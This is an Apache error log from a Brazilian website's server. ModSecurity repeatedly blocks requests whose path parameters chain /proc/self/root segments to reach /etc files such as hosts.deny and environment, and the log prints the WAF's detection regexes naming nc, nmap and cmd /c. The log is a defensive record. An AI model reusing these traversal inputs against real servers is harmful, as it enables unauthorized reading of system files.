[Fri Mar 20 05:35:50.404078 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:42674] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G5jJ3M9BSuKP7CAb22gAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:35:51.821330 2026] [mime_magic:error] [pid 7893:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:43000] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:35:55.300667 2026] [mime_magic:error] [pid 11642:tid 140411741927168] (70014)End of file found: [client 57.141.18.7:43272] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:36:39.182222 2026] [mime_magic:error] [pid 7235:tid 140411658000128] (70014)End of file found: [client 57.141.18.2:45524] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:37:04.678586 2026] [mime_magic:error] [pid 15826:tid 140411590858496] (70014)End of file found: [client 57.141.18.27:46532] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:37:29.112455 2026] [mime_magic:error] [pid 11642:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:47910] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:37:42.438596 2026] [:error] [pid 9818:tid 140411666392832] [client 216.73.216.191:51518] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0HVV1pVZ5mVmJwsFMUIAAAAEk"]
[Fri Mar 20 05:37:56.871972 2026] [:error] [pid 10189:tid 140411607643904] [client 216.73.216.191:33082] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0HZDJ3M9BSuKP7CAb3gQAAAJA"]
[Fri Mar 20 05:38:28.445858 2026] [mime_magic:error] [pid 11167:tid 140411599251200] (70014)End of file found: [client 57.141.18.68:51542] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:39:36.993776 2026] [mime_magic:error] [pid 26799:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:53860] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:39:47.190109 2026] [mime_magic:error] [pid 21219:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:54770] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:40:04.906867 2026] [:error] [pid 11167:tid 140411658000128] [client 216.73.216.191:55916] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0H5PHIg5MgXLBnicPeNwAAAco"]
[Fri Mar 20 05:40:04.906943 2026] [:error] [pid 11167:tid 140411658000128] [client 216.73.216.191:55916] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.py"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0H5PHIg5MgXLBnicPeNwAAAco"]
[Fri Mar 20 05:41:43.348868 2026] [mime_magic:error] [pid 15826:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:60014] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:42:47.253806 2026] [mime_magic:error] [pid 7235:tid 140411641214720] (70014)End of file found: [client 57.141.18.63:34502] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:46:18.907594 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.241.31:41936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0JWl1pVZ5mVmJwsFMV4gAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:46:20.319041 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:41944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0JXBCii7xarUs8iHZNmAAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:47:07.080103 2026] [mime_magic:error] [pid 9818:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:45718] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:47:07.113809 2026] [mime_magic:error] [pid 7235:tid 140411632822016] (70014)End of file found: [client 74.7.241.31:41952] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc
[Fri Mar 20 05:47:27.590006 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.241.31:53928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0JnwF0L0L-SsrnPo5ONwAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:47:45.939960 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.241.31:52640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0JsTJ3M9BSuKP7CAb62QAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:47:47.237946 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.241.31:33992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0JswF0L0L-SsrnPo5OPQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:47:48.531301 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.241.31:39282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0JtBCii7xarUs8iHZNzgAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:47:49.840176 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:39290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Jtda6ubjKNq_cu4a4DAAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:47:52.377126 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.241.31:39298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0JuF1pVZ5mVmJwsFMWNQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:48:19.831851 2026] [:error] [pid 7235:tid 140411733534464] [client 216.73.216.191:48852] [client 216.73.216.191] ModSecurity: Warning. Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0J0_qxLDW4GITHUkTKUAAAAQE"]
[Fri Mar 20 05:48:19.831971 2026] [:error] [pid 7235:tid 140411733534464] [client 216.73.216.191:48852] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer|elnet\\\\.exe|clsh8?)|(?:w(?:guest|sh)|rcmd)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:32)\\\\b|\\\\b\\\\W*?\\\\/c)|hmod.{0,40}?\\\\+.{0,3}x))|[\\\\;\\\\|\\\\`]\\\\W*?\\\\b(?:(?:c(?:h(?:grp|mod|own| ..." at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: cmd/c found within ARGS:fileloc: //lib/python2.7/site-packages/cloudinit/cmd/cloud_id.pyc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0J0_qxLDW4GITHUkTKUAAAAQE"]
[Fri Mar 20 05:49:00.359337 2026] [mime_magic:error] [pid 7235:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:51018] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:49:47.783507 2026] [mime_magic:error] [pid 26799:tid 140411616036608] (70014)End of file found: [client 216.73.216.191:52968] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:50:12.021783 2026] [mime_magic:error] [pid 31215:tid 140411733534464] (70014)End of file found: [client 57.141.18.4:54034] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:50:36.889915 2026] [mime_magic:error] [pid 9818:tid 140411607643904] (70014)End of file found: [client 57.141.18.83:55254] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:51:13.983114 2026] [mime_magic:error] [pid 21219:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:57212] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:51:51.538128 2026] [mime_magic:error] [pid 11642:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:59160] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:52:16.683111 2026] [mime_magic:error] [pid 11642:tid 140411666392832] (70014)End of file found: [client 57.141.18.96:60262] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:52:16.857939 2026] [mime_magic:error] [pid 10189:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:60276] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:52:25.930224 2026] [mime_magic:error] [pid 10189:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:60678] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:53:56.362411 2026] [mime_magic:error] [pid 26799:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:36726] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:54:01.229792 2026] [mime_magic:error] [pid 11642:tid 140411582465792] (70014)End of file found: [client 57.141.18.42:37046] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:54:27.109811 2026] [mime_magic:error] [pid 21219:tid 140411590858496] (70014)End of file found: [client 74.7.241.31:43292] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/bin
[Fri Mar 20 05:54:32.664574 2026] [mime_magic:error] [pid 11642:tid 140411574073088] (70014)End of file found: [client 57.141.18.70:38772] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:54:34.819809 2026] [mime_magic:error] [pid 7893:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:38758] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:55:11.155684 2026] [mime_magic:error] [pid 31215:tid 140411733534464] (70014)End of file found: [client 57.141.18.87:40396] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:55:22.327733 2026] [mime_magic:error] [pid 11642:tid 140411725141760] (70014)End of file found: [client 57.141.18.101:40986] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:57:27.149990 2026] [mime_magic:error] [pid 26799:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:47214] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:57:30.576034 2026] [mime_magic:error] [pid 10189:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:47464] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:57:47.084047 2026] [mime_magic:error] [pid 15826:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:43220] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/bin
[Fri Mar 20 05:58:55.530695 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.241.31:44318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0MTl1pVZ5mVmJwsFMYWwAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
